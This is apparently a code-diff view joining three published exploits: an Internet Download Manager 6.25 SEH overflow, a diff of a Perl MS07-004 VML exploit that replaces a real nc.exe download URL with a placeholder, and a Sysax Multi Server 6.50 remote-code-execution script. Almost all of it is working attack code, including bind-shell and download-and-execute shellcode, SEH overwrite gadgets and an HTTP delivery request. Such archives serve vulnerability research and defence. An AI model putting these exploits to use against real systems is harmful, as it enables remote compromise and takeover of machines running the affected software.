# Exploit Title: Internet Download Manager 6.25 Build 14 - 'Find file' SEH Buffer Overflow (Unicode)
# Date: 20-3-2016
# Exploit Author: Rakan Alotaibi
# Contact: https://twitter.com/hxteam
# Software Link: http://mirror2.internetdownloadmanager.com/idman625build14.exe
# Tested on: Windows 7 SP1 x86
# How to exploit: IDM > Downloads > Find > paste exploit string into 'Find file' textbox
tag = "AvAv"
# msfvenom -p windows/shell_bind_tcp lport=4444 -e x86/unicode_upper BufferRegister=EAX
shellcode = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ"
"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J"
"BKL9XU2M0KPM0QP3YZENQ7PQTTKR0NPDKR2LLDKQBN44KSBMXLO7GOZO601KO6LO"
"LS1SLM2NLMP7Q8OLMKQY7IRZR1BQG4K22N04K0JOLDK0LN1SHJC0HM18Q0Q4K0YO"
"0KQ9CTKOYLX9SNZQ94KNTDKKQ8V01KOVLGQ8OLMKQY708K0D5KFLC3MKHOKCMNDD"
"5ZD0X4KB8O4M1IC2F4KLL0KTKPXMLKQICDKKTDKKQJ0SY0DO4NDQK1KS1QIPZ21K"
"OK01O1O1JDKMBZKTM1M2HP3OBKPKP1XT7SCNR1OB42H0LCGO6LGKOIEH860M1M0K"
"PMYXD1DPPQXMY3PBKKPKOHU2JKXR9R0IRKMQ0R0Q00PQXJJLO9OIPKOIE4WQXM2K"
"PN11L4IYVQZLPQFPWS8XBIKNW1WKOHU0WRHWG9YOHKOKO8U27BHD4ZLOKYQKOYE0"
"W671X2UBNPMS1KOYEBH2C2MRDM0TIIS27QG0WP1ZVBJLR29PVK2KM3697PDNDOLK"
"QM1TM14NDLPWVKP14QD0PQF26PVOV26PNQFR6QC26QXBYXLOO3VKO9E3YK00NB6O"
"VKOP0QXKX57MMC0KOZ5WKL0FUFBB6QX5V5E7MEMKOXUOLKV3LKZ3PKKIP45M57KP"
"GMCCB2OBJKPQCKO9EAA")
# Windows NtAccessCheckAndAuditAlarm EggHunter
# Size: 32 bytes
egghunter = (
"PPYAIAIAIAIAQATA"
"XAZAPA3QADAZABAR"
"ALAYAIAQAIAQAPA5"
"AAAPAZ1AI1AIAIAJ"
"11AIAIAXA58AAPAZ"
"ABABQI1AIQIAIQI1"
"111AIAJQI1AYAZBA"
"BABABAB30APB944J"
"BQV51HJKOLOPBR2Q"
"ZKRPXXMNNOLKUPZ2"
"TJOWHKPOQKPT6DKJ"
"ZVOT5ZJVOBUK7KOK"
"7LJA")
buffersize = 6000
nseh = "\x61\x47" # popad + venetian pad
seh = "\x8d\x51" # 0x0051008d: pop edi # pop esi # ret [IDMan.exe]
venalign = (
"\x47" # venetian pad
"\x55" # push ebp
"\x47" # venetian pad
"\x58" # pop eax
"\x47" # venetian pad
"\x05\x18\x11" # add eax,11001800
"\x47" # venetian pad
"\x2d\x17\x11" # sub eax,11001700
"\x47" # venetian pad
"\x50" # push eax
"\x47" # venetian pad
"\xc3" # ret
)
venalign2 = (
"\x43" # venetian pad
"\x47" # inc edi
"\x43" # venetian pad
"\x57" # push edi
"\x43" # venetian pad
"\x58" # pop eax
"\x43" # venetian pad
"\x05\x18\x11" # add eax,11001800
"\x43" # venetian pad
"\x2d\x17\x11" # sub eax,11001700
"\x43" # venetian pad
"\x50" # push eax
"\x43" # venetian pad
"\xc3" # ret
)
junk2 = "\x71" * 108
junk3 = "\x71" * 110
evil2 = tag + venalign2 + junk3 + shellcode
junk = "\x42" * (2192-(len(evil2)))
evil = junk + evil2 + nseh + seh + venalign + junk2 + egghunter
fill = "\x47" * (buffersize-len(evil))
buffer = evil + fill
filename = "exploit.txt"
file = open(filename, 'w')
file.write(buffer)
file.close()
print buffer
print "[+] File created successfully"

View file

@ -5,7 +5,7 @@
$html = "laz.html";
print "(c) pang0 // www.tcbilisim.org\nbug found3d by LifeAsaGeek\nMS07-004 VML integer overflow exploit\nusage: perl $0 <shell> <opt>\n",
"shell => -b bind(31337)\n-d down.exec if selc. -d u must a down addr. \n",
"exam: perl $0 -b\nexam2: perl $0 -d http://blah.com/nc.exe\n" and exit if !$ARGV[0];
"exam: perl $0 -b\nexam2: perl $0 -d http://server/nc.exe\n" and exit if !$ARGV[0];
#down exec
$down =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03".
@ -47,7 +47,7 @@ $bind =
"\x82\x2b\x26\xbb\xcd\x18\x25\xee\x5b\x83\x0a\x50\xf9\xf6\xde\x67".
"\x5a\x83\x0c\xc7\xd9\x7c\xda\x38";
if ($ARGV[0] eq '-d'){
$shlaz = $down;$url = $ARGV[1];$url = "http://pang0.by.ru/wget/nc.exe";
$shlaz = $down;$url = $ARGV[1];$url = "http://server/nc.exe";
print "u must start http:// or ftp://\n" and exit if !($url =~ /http|ftp/);
}
$shlaz = $bind if $ARGV[0] eq '-b';

View file

@ -0,0 +1,91 @@
# Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit
# Date: 03/21/2016
# Exploit Author: Paul Purcell
# Contact: ptpxploit at gmail
# Vendor Homepage: http://www.sysax.com/
# Vulnerable Version Download: http://download.cnet.com/Sysax-Multi-Server/3000-2160_4-76171493.html (6.50 as of posting date)
# Version: Sysax Multi Server 6.50
# Tested on: Windows XP SP3 English
# Category: Remote Code Execution
#
# Timeline: 03/11/16 Bug found
# 03/14/16 Vender notified
# 03/17/16 Vender acknowledges issue and publishes patch (6.51)
# 03/21/16 Exploit Published
#
# Summary: This is a post authentication exploit that requires the HTTP file sharing service to be running on
# Sysas Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the
# service. Once exploited, the shellcode runs with SYSTEM privileges. In this example, we attack folder_
# in dltslctd_name1.htm. The root path of the user shouldn't break the buffer offset in the stack, though
# the user will need to have permission to delete folders. If the user has file delete permissions, file_
# will work as well. mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can
# be modified to adapt to a users permissions.
import httplib
target = 'webbackup'
port = 80
sid = '57e546cb7204b60f0111523409e49bdb16692ab5' #retrieved from browser URL after login
#example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm
#msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a"
shell=("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd7\xae"
"\x73\xe9\x83\xeb\xfc\xe2\xf4\x2b\x46\xf1\xe9\xd7\xae\x13\x60"
"\x32\x9f\xb3\x8d\x5c\xfe\x43\x62\x85\xa2\xf8\xbb\xc3\x25\x01"
"\xc1\xd8\x19\x39\xcf\xe6\x51\xdf\xd5\xb6\xd2\x71\xc5\xf7\x6f"
"\xbc\xe4\xd6\x69\x91\x1b\x85\xf9\xf8\xbb\xc7\x25\x39\xd5\x5c"
"\xe2\x62\x91\x34\xe6\x72\x38\x86\x25\x2a\xc9\xd6\x7d\xf8\xa0"
"\xcf\x4d\x49\xa0\x5c\x9a\xf8\xe8\x01\x9f\x8c\x45\x16\x61\x7e"
"\xe8\x10\x96\x93\x9c\x21\xad\x0e\x11\xec\xd3\x57\x9c\x33\xf6"
"\xf8\xb1\xf3\xaf\xa0\x8f\x5c\xa2\x38\x62\x8f\xb2\x72\x3a\x5c"
"\xaa\xf8\xe8\x07\x27\x37\xcd\xf3\xf5\x28\x88\x8e\xf4\x22\x16"
"\x37\xf1\x2c\xb3\x5c\xbc\x98\x64\x8a\xc6\x40\xdb\xd7\xae\x1b"
"\x9e\xa4\x9c\x2c\xbd\xbf\xe2\x04\xcf\xd0\x51\xa6\x51\x47\xaf"
"\x73\xe9\xfe\x6a\x27\xb9\xbf\x87\xf3\x82\xd7\x51\xa6\x83\xdf"
"\xf7\x23\x0b\x2a\xee\x23\xa9\x87\xc6\x99\xe6\x08\x4e\x8c\x3c"
"\x40\xc6\x71\xe9\xc6\xf2\xfa\x0f\xbd\xbe\x25\xbe\xbf\x6c\xa8"
"\xde\xb0\x51\xa6\xbe\xbf\x19\x9a\xd1\x28\x51\xa6\xbe\xbf\xda"
"\x9f\xd2\x36\x51\xa6\xbe\x40\xc6\x06\x87\x9a\xcf\x8c\x3c\xbf"
"\xcd\x1e\x8d\xd7\x27\x90\xbe\x80\xf9\x42\x1f\xbd\xbc\x2a\xbf"
"\x35\x53\x15\x2e\x93\x8a\x4f\xe8\xd6\x23\x37\xcd\xc7\x68\x73"
"\xad\x83\xfe\x25\xbf\x81\xe8\x25\xa7\x81\xf8\x20\xbf\xbf\xd7"
"\xbf\xd6\x51\x51\xa6\x60\x37\xe0\x25\xaf\x28\x9e\x1b\xe1\x50"
"\xb3\x13\x16\x02\x15\x83\x5c\x75\xf8\x1b\x4f\x42\x13\xee\x16"
"\x02\x92\x75\x95\xdd\x2e\x88\x09\xa2\xab\xc8\xae\xc4\xdc\x1c"
"\x83\xd7\xfd\x8c\x3c")
arg="folder_" #can also be changed to file_ if user has file delete permissions
pid="dltslctd_name1" #Can be changed, though padding will needed to be updated as well
junk1="A"*26400 #Initial pile of junk
noppad="\x90"*296 #Place to land from our long jump and before our shellcode
junkfill="\x90"*(768-len(shell)) #Fill in after our shellcode till nseh
nseh="\xeb\x06\x90\x90" #Short jump over SEH
seh="\xd7\x2a\x92\x5d" #pop esi # pop edi # ret RPCNS4.dll
jump="\xe9\x13\xfc\xff\xff" #jump back 1000 bytes for plenty of room for your shellcode
junk2="D"*9500 #Junk at the end
buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2)
head = "Host: Wee! \r\n"
head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n"
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
head += "Accept-Language: en-us,en;q=0.5\r\n"
head += "Accept-Encoding: gzip, deflate\r\n"
head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n"
head += "Proxy-Connection: keep-alive\r\n"
head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n"
head += "Content-Length: 1337\r\n"
head += "If-Modified-Since: *\r\n"
head += "\r\n"
head += "-----------------------------217830224120\r\n"
head += "\r\n"
head += "\r\n"
head += "\r\n"
head += buff
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)